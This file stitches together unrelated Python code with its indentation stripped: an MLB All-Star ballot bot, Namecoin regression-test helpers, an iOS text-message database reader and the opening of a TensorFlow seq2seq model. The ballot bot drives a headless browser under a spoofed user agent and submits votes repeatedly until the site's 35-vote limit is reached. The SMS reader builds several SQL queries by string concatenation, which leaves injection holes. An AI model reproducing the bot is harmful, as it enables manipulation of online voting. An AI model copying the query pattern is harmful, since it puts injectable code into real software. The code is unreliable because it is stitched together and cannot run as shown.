def ensure_switched(captcha):
broke = False
for i in range(0, 50):
try:
time.sleep(0.25)
captcha.click()
except:
broke = True
break
if not broke:
raise ClickError()
players = [
"Hosmer, E",
"Rizzo, A",
"Infante, O",
"La Stella, T",
"Escobar, A",
"Castro, S",
"Moustakas, M",
"Bryant, K",
"Perez, S",
"Montero, M",
"Morales, K",
"Cain, L",
"Gordon, A",
"Rios, A",
"Aoki, N",
"Coghlan, C",
"Fowler, D"
]
buttons = {}
while True:
dob = self.controller.prompt_question("DOB: ")
retest = re.match(r"""(\d{1,2})/(\d{1,2})/(\d{4})""", dob)
if retest:
dobmonth = int(retest.group(1), base=10)
dobday = int(retest.group(2), base=10)
dobyear = int(retest.group(3), base=10)
break
else:
self.controller.set_status("Expected format: MM/DD/YYYY")
time.sleep(2)
zipcode = self.controller.prompt_question("Zip: ")
while True:
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36"
browser = webdriver.PhantomJS(desired_capabilities=dcap)
browser.set_window_size(1900, 3000)
self.controller.set_status("Loading MLB All-Star page")
browser.get('http://www.mlb.com/mlb/events/all_star/y2015/ballot.jsp')
self.controller.set_status("Loaded")
email = self.controller.prompt_question("Email address: ")
self.controller.set_status("Voting for players")
for p in players:
self.controller.set_status("Voting for %s" % p)
xpath = '//*[text()[.="%s"]]/../../..//span[@class="selectBtn"]' % p
voted_xpath = '//div[@class="playerSelectedInfo"]/*[text()[.="%s"]][@class="playerName"]' % p
WebDriverWait(browser, 20).until(EC.visibility_of_element_located((By.XPATH, xpath)))
voting_happened = False
while not voting_happened:
browser.find_element_by_xpath(xpath).click()
for i in range(0, 50):
try:
browser.find_element_by_xpath(voted_xpath)
voting_happened = True
break
except:
time.sleep(0.25)
self.controller.set_status("Clicking vote")
browser.find_element_by_id("vote-now").click()
registration = browser.find_element_by_id("register_vote")
# Fill in e-mail
self.controller.set_status("Filling out form")
registration.find_element_by_id("e").send_keys(email)
webdriver.support.select.Select(registration.find_element_by_id("bd_m")).select_by_value("%s" % dobmonth)
webdriver.support.select.Select(registration.find_element_by_id("bd_d")).select_by_value("%s" % dobday)
webdriver.support.select.Select(registration.find_element_by_id("bd_y")).select_by_value("%s" % dobyear)
registration.find_element_by_id("z").send_keys(zipcode)
webdriver.support.select.Select(registration.find_element_by_id("ft1")).select_by_value("kc")
spam = registration.find_element_by_id("on")
if spam.is_selected():
spam.click()
times = 0
while True:
xpath = '//input[contains(@id, "v2-") and @name = "v2" and not(ancestor::div[contains(@style, "display: none")])]'
captcha_xpath = '//input[contains(@id, "v2-") and @name = "v2" and not(ancestor::div[contains(@style, "display: none")])]/../../../..//img'
captcha = browser.find_element_by_xpath(xpath)
captcha.click()
full_captcha = browser.find_element_by_xpath(captcha_xpath)
loaded = False
for i in range(0, 50):
size = full_captcha.size
if size['height'] == 0 or size['width'] == 0:
time.sleep(0.25)
else:
time.sleep(0.25)
loaded = True
break
if loaded:
location = full_captcha.location
scrollX = int(browser.execute_script('return window.scrollX'))
scrollY = int(browser.execute_script('return window.scrollY'))
left = int(location['x']) - scrollX
top = int(location['y']) - scrollY
right = left + int(size['width'])
bottom = top + int(size['height'])
browser.save_screenshot('screenshot.png')
im = Image.open('screenshot.png')
im = im.crop((left, top, right, bottom))
im.save('captcha.gif')
res = self.controller.prompt_captcha("captcha.gif")
captcha.send_keys(res)
button = browser.find_element_by_xpath('//a[contains(@id, "vote-now-button") and not(ancestor::div[contains(@style, "display: none")])]')
browser.execute_script('window.vote_alert_text = ""; window.alert = function(t) { window.vote_alert_text = t };')
self.controller.set_status("Voting")
while True:
button.click()
try:
ensure_switched(captcha)
except ClickError:
continue
break
alert_text = browser.execute_script('return window.vote_alert_text')
voted_35 = False
if len(alert_text) > 0:
print("ALERT! %s" % alert_text)
if re.search('voted 35 times', alert_text):
voted_35 = True
try:
ensure_switched(captcha)
except:
pass
if voted_35:
break
print("Voted 35 times!")
browser.quit()
class Question(object):
def __init__(self, q):
self.q = q
class Captcha(object):
def __init__(self, img):
self.img = img
class Status(object):
def __init__(self, s):
self.s = s
class AllStarApp(tk.Tk):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.geometry('250x100')
self.title('All-Star Voting')
self.in_q = queue.Queue()
self.out_q = queue.Queue()
container = ttk.Frame(self)
container.pack(fill=tk.BOTH, expand=tk.YES)
container.grid_rowconfigure(0, weight=1)
container.grid_columnconfigure(0, weight=1)
self.frames = {}
for F in (CaptchaPage, StatusPage, PromptPage):
frame = F(container, self)
self.frames[F] = frame
frame.grid(row=0, column=0, sticky="nsew", padx=5, pady=5)
self.in_q.put(Status("Royals All-Star Voting!"))
self.process_queue()
def process_queue(self):
try:
a = self.in_q.get_nowait()
if type(a) is Status:
self.show_frame(StatusPage)
self.frames[StatusPage].set_status(a.s)
elif type(a) is Captcha:
self.show_frame(CaptchaPage)
self.frames[CaptchaPage].prompt_captcha(a.img)
elif type(a) is Question:
self.show_frame(PromptPage)
self.frames[PromptPage].prompt_question(a.q)
except queue.Empty:
pass
self.after(250, self.process_queue)
def show_frame(self, c):
frame = self.frames[c]
frame.tkraise()
def prompt_question(self, q):
self.in_q.put(Question(q))
return self.out_q.get(block=True, timeout=None)
def set_status(self, s):
self.in_q.put(Status(s))
def prompt_captcha(self, img):
self.in_q.put(Captcha(img))
return self.out_q.get(block=True, timeout=None)
class CaptchaPage(ttk.Frame):
def __init__(self, parent, controller):
super().__init__(parent)
self.controller = controller
self.label = tk.Label(self)
self.label.grid(column=0, row=0, columnspan=2, sticky="n", pady=5)
clabel = ttk.Label(self, text="Captcha:")
clabel.grid(column=0, row=1, sticky="nw")
self.captcha = tk.StringVar()
self.entry = ttk.Entry(self, textvariable=self.captcha)
self.entry.grid(column=1, row=1, sticky="new")
self.grid_columnconfigure(1, weight=1)
self.grid_rowconfigure(1, weight=1)
def pressed_enter(self, event):
self.controller.out_q.put(self.captcha.get())
self.controller.unbind("<Return>", self.binding)
print("Captcha was %s" % self.captcha.get())
def prompt_captcha(self, c):
self.captcha.set("")
image = tk.PhotoImage(file=c)
self.label.configure(image=image, compound="none")
self.label.image = image
self.binding = self.controller.bind("<Return>", self.pressed_enter)
self.entry.focus_set()
print("Prompting captcha (%s)..." % c)
class StatusPage(ttk.Frame):
def __init__(self, parent, controller):
super().__init__(parent)
self.controller = controller
self.status = tk.StringVar()
label1 = ttk.Label(self, text="Status: ")
label2 = ttk.Label(self, textvariable=self.status)
label1.grid(column=0, row=0, sticky="nw")
label2.grid(column=1, row=0, sticky="nwe")
self.status.set("This is a test")
self.grid_columnconfigure(1, weight=1)
self.grid_rowconfigure(0, weight=1)
def set_status(self, s):
print("Status: %s" % s)
self.status.set(s)
class PromptPage(ttk.Frame):
def __init__(self, parent, controller):
super().__init__(parent)
self.controller = controller
self.question = tk.StringVar()
self.answer = tk.StringVar()
qlabel = ttk.Label(self, textvariable=self.question)
qlabel.grid(row=0, column=0, sticky="nw")
self.entry = ttk.Entry(self, textvariable=self.answer)
self.entry.grid(row=0, column=1, sticky="nwe")
self.question.set("Favorite color?")
self.grid_columnconfigure(1, weight=1)
self.grid_rowconfigure(0, weight=1)
def pressed_enter(self, event):
self.controller.out_q.put(self.answer.get())
self.controller.unbind("<Return>", self.binding)
print(self.answer.get())
def prompt_question(self, q):
self.question.set(q)
self.answer.set("")
self.binding = self.controller.bind("<Return>", self.pressed_enter)
self.entry.focus_set()
print(q)
app = AllStarApp()
ThreadedTask(app).start()
app.mainloop()
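# The GUI/worker handoff above boils down to two queues: the worker thread
# puts a Question/Captcha/Status object on in_q and blocks on out_q, while
# the Tk side polls in_q every 250 ms and pushes the user's answer onto
# out_q. A stripped-down version of the same pattern (no Tk, placeholder
# strings only) would be:
#
# import queue
# import threading
#
# in_q, out_q = queue.Queue(), queue.Queue()
#
# def worker():
#     in_q.put("What is your name?")       # ask the UI a question
#     print("worker got:", out_q.get())    # block until it answers
#
# threading.Thread(target=worker).start()
# print("ui got:", in_q.get())             # UI receives the question
# out_q.put("Ada")                         # ...and replies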
|
|
# Copyright (c) 2014 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Helpful routines for regression testing
#
# Add python-bitcoinrpc to module search path:
import os
import sys
from decimal import Decimal, ROUND_DOWN
import json
import random
import shutil
import subprocess
import time
import re
from authproxy import AuthServiceProxy, JSONRPCException
from util import *
def p2p_port(n):
return 11000 + n + os.getpid()%999
def rpc_port(n):
return 12000 + n + os.getpid()%999
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def sync_blocks(rpc_connections, wait=1):
"""
Wait until everybody has the same block count
"""
while True:
counts = [ x.getblockcount() for x in rpc_connections ]
if counts == [ counts[0] ]*len(counts):
break
time.sleep(wait)
def sync_mempools(rpc_connections, wait=1):
"""
Wait until everybody has the same transactions in their memory
pools
"""
while True:
pool = set(rpc_connections[0].getrawmempool())
num_match = 1
for i in range(1, len(rpc_connections)):
if set(rpc_connections[i].getrawmempool()) == pool:
num_match = num_match+1
if num_match == len(rpc_connections):
break
time.sleep(wait)
bitcoind_processes = {}
def initialize_datadir(dirname, n):
datadir = os.path.join(dirname, "node"+str(n))
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "namecoin.conf"), 'w') as f:
f.write("regtest=1\n");
f.write("rpcuser=rt\n");
f.write("rpcpassword=rt\n");
f.write("port="+str(p2p_port(n))+"\n");
f.write("rpcport="+str(rpc_port(n))+"\n");
return datadir
def base_node_args(i):
"""
Return base arguments to always use for node i. These arguments
are those that are also present for the chain cache and must thus
be set for all runs.
"""
# We choose nodes 1 and 2 to keep -namehistory, because this allows
# us to test both nodes with it and without it in both split
# network parts (0/1 vs 2/3).
if i == 1 or i == 2:
return ["-namehistory"]
return []
def initialize_chain(test_dir):
"""
Create (or copy from cache) a 200-block-long chain and
4 wallets.
namecoind and namecoin-cli must be in search path.
"""
if not os.path.isdir(os.path.join("cache", "node0")):
devnull = open("/dev/null", "w+")
# Create cache directories, run bitcoinds:
for i in range(4):
datadir=initialize_datadir("cache", i)
args = [ os.getenv("NAMECOIND", "namecoind"), "-keypool=1", "-datadir="+datadir, "-discover=0" ]
args.extend(base_node_args(i))
if i > 0:
args.append("-connect=127.0.0.1:"+str(p2p_port(0)))
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: namecoind started, calling namecoin-cli -rpcwait getblockcount"
subprocess.check_call([ os.getenv("NAMECOINCLI", "namecoin-cli"), "-datadir="+datadir,
"-rpcwait", "getblockcount"], stdout=devnull)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: namecoin-cli -rpcwait getblockcount completed"
devnull.close()
rpcs = []
for i in range(4):
try:
url = "http://rt:[email protected]:%d"%(rpc_port(i),)
rpcs.append(AuthServiceProxy(url))
except:
sys.stderr.write("Error connecting to "+url+"\n")
sys.exit(1)
# Create a 200-block-long chain; each of the 4 nodes
# gets 25 mature blocks and 25 immature.
# blocks are created with timestamps 10 minutes apart, starting
# at 1 Jan 2014
block_time = 1388534400
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(rpcs, block_time)
rpcs[peer].generate(1)
block_time += 10*60
# Must sync before next peer starts generating blocks
sync_blocks(rpcs)
# Shut them down, and clean up cache directories:
stop_nodes(rpcs)
wait_bitcoinds()
for i in range(4):
os.remove(log_filename("cache", i, "debug.log"))
os.remove(log_filename("cache", i, "db.log"))
os.remove(log_filename("cache", i, "peers.dat"))
os.remove(log_filename("cache", i, "fee_estimates.dat"))
for i in range(4):
from_dir = os.path.join("cache", "node"+str(i))
to_dir = os.path.join(test_dir, "node"+str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(test_dir, i) # Overwrite port/rpcport in bitcoin.conf
def initialize_chain_clean(test_dir, num_nodes):
"""
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization.
"""
for i in range(num_nodes):
datadir=initialize_datadir(test_dir, i)
def _rpchost_to_args(rpchost):
'''Convert optional IP:port spec to rpcconnect/rpcport args'''
if rpchost is None:
return []
match = re.match('(\[[0-9a-fA-f:]+\]|[^:]+)(?::([0-9]+))?$', rpchost)
if not match:
raise ValueError('Invalid RPC host spec ' + rpchost)
rpcconnect = match.group(1)
rpcport = match.group(2)
if rpcconnect.startswith('['): # remove IPv6 [...] wrapping
rpcconnect = rpcconnect[1:-1]
rv = ['-rpcconnect=' + rpcconnect]
if rpcport:
rv += ['-rpcport=' + rpcport]
return rv
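# For reference, two example conversions:
# _rpchost_to_args(None) == []
# _rpchost_to_args("[::1]:18443") == ['-rpcconnect=::1', '-rpcport=18443']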
def start_node(i, dirname, extra_args=[], rpchost=None, timewait=None, binary=None):
"""
Start a namecoind and return RPC connection to it
"""
datadir = os.path.join(dirname, "node"+str(i))
if binary is None:
binary = os.getenv("NAMECOIND", "namecoind")
args = [ binary, "-datadir="+datadir, "-keypool=1", "-discover=0", "-rest" ]
args.extend(extra_args)
args.extend(base_node_args(i))
bitcoind_processes[i] = subprocess.Popen(args)
devnull = open("/dev/null", "w+")
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: namecoind started, calling namecoin-cli -rpcwait getblockcount"
subprocess.check_call([ os.getenv("NAMECOINCLI", "namecoin-cli"), "-datadir="+datadir] +
_rpchost_to_args(rpchost) +
["-rpcwait", "getblockcount"], stdout=devnull)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: calling namecoin-cli -rpcwait getblockcount returned"
devnull.close()
url = "http://rt:rt@%s:%d" % (rpchost or '127.0.0.1', rpc_port(i))
if timewait is not None:
proxy = AuthServiceProxy(url, timeout=timewait)
else:
proxy = AuthServiceProxy(url)
proxy.url = url # store URL on proxy for info
return proxy
def start_nodes(num_nodes, dirname, extra_args=None, rpchost=None, binary=None):
"""
Start multiple namecoinds, return RPC connections to them
"""
if extra_args is None: extra_args = [ [] for i in range(num_nodes) ]
if binary is None: binary = [ None for i in range(num_nodes) ]
return [ start_node(i, dirname, extra_args[i], rpchost, binary=binary[i]) for i in range(num_nodes) ]
def log_filename(dirname, n_node, logname):
return os.path.join(dirname, "node"+str(n_node), "regtest", logname)
def stop_node(node, i):
node.stop()
bitcoind_processes[i].wait()
del bitcoind_processes[i]
def stop_nodes(nodes):
for node in nodes:
node.stop()
del nodes[:] # Emptying array closes connections as a side effect
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def wait_bitcoinds():
# Wait for all bitcoinds to cleanly exit
for bitcoind in bitcoind_processes.values():
bitcoind.wait()
bitcoind_processes.clear()
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:"+str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
while any(peer['version'] == 0 for peer in from_connection.getpeerinfo()):
time.sleep(0.1)
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def find_output(node, txid, amount):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found"%(txid,str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >=0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({ "txid" : t["txid"], "vout" : t["vout"], "address" : t["address"] } )
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d"%(amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out+fee
change = amount_in - amount
if change > amount*2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change/2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
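# Worked example (Decimal inputs assumed): with amount_in=50, amount_out=10
# and fee=0.1, change is 39.9, which exceeds 2 * 10.1, so make_change asks
# the node for a change address, assigns it 19.95 (half the change, rounded
# down to 8 places) and sends the remaining 19.95 to a second new address,
# i.e. two change outputs instead of one oversized one.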
def send_zeropri_transaction(from_node, to_node, amount, fee):
"""
Create&broadcast a zero-priority transaction.
Returns (txid, hex-encoded-txdata)
Ensures transaction is zero-priority by first creating a send-to-self,
then using its output
"""
# Create a send-to-self with confirmed inputs:
self_address = from_node.getnewaddress()
(total_in, inputs) = gather_inputs(from_node, amount+fee*2)
outputs = make_change(from_node, total_in, amount+fee, fee)
outputs[self_address] = float(amount+fee)
self_rawtx = from_node.createrawtransaction(inputs, outputs)
self_signresult = from_node.signrawtransaction(self_rawtx)
self_txid = from_node.sendrawtransaction(self_signresult["hex"], True)
vout = find_output(from_node, self_txid, amount+fee)
# Now immediately spend the output to create a 1-input, 1-output
# zero-priority transaction:
inputs = [ { "txid" : self_txid, "vout" : vout } ]
outputs = { to_node.getnewaddress() : float(amount) }
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"])
def random_zeropri_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random zero-priority transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(txid, txhex) = send_zeropri_transaction(from_node, to_node, amount, fee)
return (txid, txhex, fee)
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount+fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
def assert_equal(thing1, thing2):
if thing1 != thing2:
raise AssertionError("%s != %s"%(str(thing1),str(thing2)))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s"%(str(thing1),str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
try:
fun(*args, **kwds)
except exc:
pass
except Exception as e:
raise AssertionError("Unexpected exception raised: "+type(e).__name__)
else:
raise AssertionError("No exception raised")
|
|
#!/usr/bin/env python3
# encoding: utf-8
import sqlite3
import operator
import os
import re
import sys
import datetime
class reader():
"""A class for the easy analysis of iOS text message databases."""
def __init__(self):
"""
Initializes the reader instance variables.
"""
# sqlite3 connection to the message database.
self._connSMS = None
# sqlite3 connection to the contacts database.
self._connAdd = None
# Dictionary for caching of the numbers that handles refer to.
self._handleDict = {}
# Dictionary for caching the total number of words for each number.
self._wordDict = {}
# Dictionary for caching the total number of messages for each number.
self._countDict = {}
# Dictionary for caching the total number of sent messages for each
# number.
self._sentDict = {}
# Boolean which defines whether the dictionaries have been built.
self._built = False
def lastDate(self):
""" Returns the date of the most recent message in the database. """
c = self._connSMS.cursor()
c.execute("SELECT `date` FROM `message` ORDER BY `date` DESC LIMIT 0, 1;")
mostrecent = c.fetchone()[0]
return self._intToDate(mostrecent)
def firstDate(self):
""" Returns the date of the most recent message in the database. """
c = self._connSMS.cursor()
c.execute("SELECT `date` FROM `message` ORDER BY `date` ASC LIMIT 0, 1;")
mostrecent = c.fetchone()[0]
return self._intToDate(mostrecent)
def getNameFromNumber(self, number):
""" Returns the name in the addressbook that corresponds to the number argument. """
# Crops the number to the last four digits
# TODO: Fix this in the event two people share the same last four
# digits.
lastfour = str(number)[-4:]
a = self._connAdd.cursor()
# Fetch the id that corresponds to the last four digits.
a.execute("SELECT multivalue_id FROM `ABPhoneLastFour` WHERE 1=1 AND `value` LIKE '" + lastfour + "' ORDER BY `value` DESC LIMIT 0, 50000;")
lastFourRow = a.fetchone()
# If there isn't an id, the name is the number.
if lastFourRow is None:
return str(number)
multiId = lastFourRow[0]
# SQL to go from id to name.
a.execute("SELECT record_id FROM `ABMultiValue` WHERE 1=1 AND `UID` LIKE '" + str(multiId) + "' ORDER BY `_rowid_` ASC LIMIT 0, 50000;")
personId = a.fetchone()[0]
a.execute("SELECT First, Last FROM `ABPerson` WHERE 1=1 AND `ROWID` LIKE '" + str(personId) + "' ORDER BY `_rowid_` ASC LIMIT 0, 50000;")
personRow = a.fetchone()
# Use only the first two words in the name.
# TODO: Correct this, it's no longer needed.
if personRow[1] is not None and personRow[0] is not None:
name = personRow[0] + " " + personRow[1].split()[0]
elif personRow[0] is not None:
name = personRow[0]
else:
name = personRow[1]
return name
def getNumberFromHandle(self, handle):
""" Returns the number that corresponds to the given handle argument. """
# If the handle is in the cache, return it from the cache.
if handle in self._handleDict.keys():
return self._handleDict[handle]
# Otherwise match it with SQL and add it to the cache.
else:
d = self._connSMS.cursor()
d.execute("SELECT `id` FROM `handle` WHERE 1=1 AND `ROWID` LIKE '" + str(handle) + "' ORDER BY `_rowid_` ASC LIMIT 0, 1;", )
result = d.fetchone()
if result is not None:
self._handleDict[handle] = result[0]
return result[0]
else:
self._handleDict[handle] = None
return None
def numbersFromName(self, name):
""" Returns the list of numbers that match a given name. """
numbers = []
# Check each number to see if it matches the name.
for number in self.getListOfNumbers():
if self.getNameFromNumber(number) == name:
numbers.append(number)
return numbers
def addAddressBook(self, path):
""" Creates a database connection to the addressbook with a given path. """
assert os.path.exists(path) and self._connAdd is None
self._connAdd = sqlite3.connect(path)
def addSMSDatabase(self, path):
""" Creates a database connection to the messages with a given path. """
assert os.path.exists(path) and self._connSMS is None
self._connSMS = sqlite3.connect(path)
def _build(self):
""" Builds the dictionaries. """
self._buildHandleDict()
self._buildOthers()
self._built = True
def _buildHandleDict(self):
""" Builds the handle dictionary. """
c = self._connSMS.cursor()
c.execute("SELECT DISTINCT `handle_id` FROM `message` ORDER BY `handle_id`;")
handleList = c.fetchall()
for handletuple in handleList:
handle = handletuple[0]
if handle == 0:
continue
self.getNumberFromHandle(handle)
def _buildOthers(self):
""" Builds the other dictionaries. """
c = self._connSMS.cursor()
for key in self._handleDict.keys():
number = self._handleDict[key]
if number not in self._countDict.keys():
self._countDict[number] = 0
if number not in self._wordDict.keys():
self._wordDict[number] = 0
if number not in self._sentDict.keys():
self._sentDict[number] = 0
c.execute("SELECT `text`, `is_sent` FROM 'message' WHERE handle_id=" + str(key))
messageList = c.fetchall()
for messagetuple in messageList:
message = messagetuple[0]
sent = messagetuple[1]
if sent:
self._sentDict[number] += 1
if message is not None:
self._countDict[number] += 1
self._wordDict[number] += len(re.findall("[a-zA-Z_]+", message))
def totalMessages(self):
""" Returns the total number of messages in the database. """
c = self._connSMS.cursor()
c.execute("SELECT COUNT(text) FROM `message`")
return c.fetchone()[0]
def getListOfNumbers(self):
""" Returns a list of all of the numbers in the messages database. """
if not self._built:
self._build()
return set(self._handleDict.values())
def messagesOnDate(self, date, number = None):
""" Returns a list of messages on a given date, optionally from a given number. """
if not self._built:
    self._build()
messages = []
beg = self._dateToInt(datetime.datetime.combine(date, datetime.time(0)))
end = self._dateToInt(datetime.datetime.combine(date, datetime.time(0)) + datetime.timedelta(days = 1))
c = self._connSMS.cursor()
if not number:
c.execute("SELECT `handle_id`, `date`, `text` FROM `message` WHERE 1=1 AND `date` > ? AND `date` < ?;", (beg, end))
rows = c.fetchall()
for mes in rows:
if mes[2] is not None:
message = Message(mes[2])
message.number = self.getNumberFromHandle(mes[0])
message.timestamp = self._intToDate(mes[1])
messages.append(message)
else:
for handle in self._getHandlesFromNumber(number):
c.execute("SELECT `handle_id`, `date`, `text` FROM `message` WHERE 1=1 AND `date` > ? AND `date` < ? AND `handle_id` = ?;", (beg, end, handle))
rows = c.fetchall()
for mes in rows:
if mes[2] is not None:
message = Message(mes[2])
message.number = self.getNumberFromHandle(mes[0])
message.timestamp = self._intToDate(mes[1])
messages.append(message)
return messages
def countOnDate(self, date, number = None):
""" Returns the count of messages on a given date, optionally from a given number. """
if not self._built:
self._build()
beg = self._dateToInt(datetime.datetime.combine(date, datetime.time(0)))
end = self._dateToInt(datetime.datetime.combine(date, datetime.time(0)) + datetime.timedelta(days = 1))
c = self._connSMS.cursor()
count = 0
if not number:
c.execute("SELECT COUNT(*) FROM `message` WHERE `date` >= ? AND `date` < ? AND `text` IS NOT NULL;", (beg, end))
count = c.fetchone()[0]
else:
for handle in self._getHandlesFromNumber(number):
c.execute("SELECT COUNT(*) FROM `message` WHERE 1=1 AND `date` > ? AND `date` < ? AND `handle_id` = ? AND `text` IS NOT NULL;", (beg, end, handle))
count += c.fetchone()[0]
return count
def totalOnDate(self, date, number = None):
""" Returns the overall total number of messages on a given date, optionally from a given number. """
if not self._built:
self._build()
end = self._dateToInt(datetime.datetime.combine(date, datetime.time(0)) + datetime.timedelta(days = 1))
c = self._connSMS.cursor()
count = 0
if not number:
c.execute("SELECT COUNT(*) FROM `message` WHERE `date` < " + str(end) + " AND `text` IS NOT NULL;")
count = c.fetchone()[0]
else:
for handle in self._getHandlesFromNumber(number):
c.execute("SELECT COUNT(*) FROM `message` WHERE 1=1 AND `date` < ? AND `handle_id` = ? AND `text` IS NOT NULL;", (end, handle))
count += c.fetchone()[0]
return count
def messagesFromNumber(self, num):
""" Returns a list of all the messages from a given number. """
if not self._built:
self._build()
handles = [handle for handle, number in self._handleDict.items() if number == num]
messages = []
c = self._connSMS.cursor()
for handle in handles:
c.execute("SELECT `handle_id`, `date`, `text`, `is_sent` FROM `message` WHERE 1=1 AND `handle_id` LIKE " + str(handle) + " ORDER BY `date`")
rows = c.fetchall()
for mes in rows:
message = Message(mes[2])
message.number = num
message.timestamp = self._intToDate(mes[1])
if mes[3] == 1:
message.sent = True
else:
message.sent = False
messages.append(message)
return messages
def countFromNumber(self, num):
""" Returns the number of messages from a given number. """
if not self._built:
self._build()
return self._countDict[num]
def wordsFromNumber(self, num):
""" Returns the total number of words from a given number. """
if not self._built:
self._build()
return self._wordDict[num]
def sentFromNumber(self, num):
""" Returns the total number of messages sent to a given number. """
if not self._built:
self._build()
return self._sentDict[num]
def _intToDate(self, integer):
""" Converts a time in interger format (seconds since January First 2001) to a datetime object. """
# TODO Fix so it doesn't need a manual timezone offset.
delta = datetime.timedelta(seconds = integer)
date = datetime.datetime(2001, 1, 1)
timezoneoffset = datetime.timedelta(hours = 5)
return (date + delta - timezoneoffset)
def _dateToInt(self, date):
""" Converts a datetime object to integer format. """
timezoneoffset = datetime.timedelta(hours = 5)
delta = date + timezoneoffset - datetime.datetime(2001, 1, 1)
return int(delta.total_seconds())
def _getHandlesFromNumber(self, num):
""" Returns a list of handles that correspond to a given number. """
handles = [handle for handle, number in self._handleDict.items() if number == num]
return handles
def instancesOf(self, phrase, num):
""" Searches for instances of a given phrase/word
:phrase: the word or phrase to search for.
:num: The number for the conversation to search.
:returns: Number of instances of the given phrase.
"""
messages = self.messagesFromNumber(num)
total = 0
for message in messages:
if message.text is not None:
total += len(re.findall(phrase.upper(), message.text.upper()))
return total
class Message():
""" Message ADT """
def __init__(self, text):
""" Creates the instance variables """
# Canonicalized Number (+15555555555)
self.number = None
# Timestamp: Datetime object.
self.timestamp = None
# Text
self.text = text
# Sent boolean
self.sent = None
def getWords(self):
""" Returns the number of words in a given message. """
if self.text:
return len(re.findall("[a-zA-Z_]+", self.text))
else:
return 0
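# Usage sketch (database paths are placeholders; both files would come from
# an unencrypted iOS backup):
#
# r = reader()
# r.addSMSDatabase("sms.db")
# r.addAddressBook("AddressBook.sqlitedb")
# print(r.totalMessages())
# for number in r.getListOfNumbers():
#     print(number, r.getNameFromNumber(number), r.countFromNumber(number))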
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Sequence-to-sequence model with an attention mechanism."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.models.rnn.translate import data_utils
class Seq2SeqModel(object):
"""Sequence-to-sequence model with attention and for multiple buckets.
This class implements a multi-layer recurrent neural network as encoder,
and an attention-based decoder. This is the same as the model described in
this paper: http://arxiv.org/abs/1412.7449 - please look there for details,
or into the seq2seq library for complete model implementation.
This class also allows to use GRU cells in addition to LSTM cells, and
sampled softmax to handle large output vocabulary size. A single-layer
version of this model, but with bi-directional encoder, was presented in
http://arxiv.org/abs/1409.0473
and sampled softmax is described in Section 3 of the following paper.
http://arxiv.org/abs/1412.2007
"""
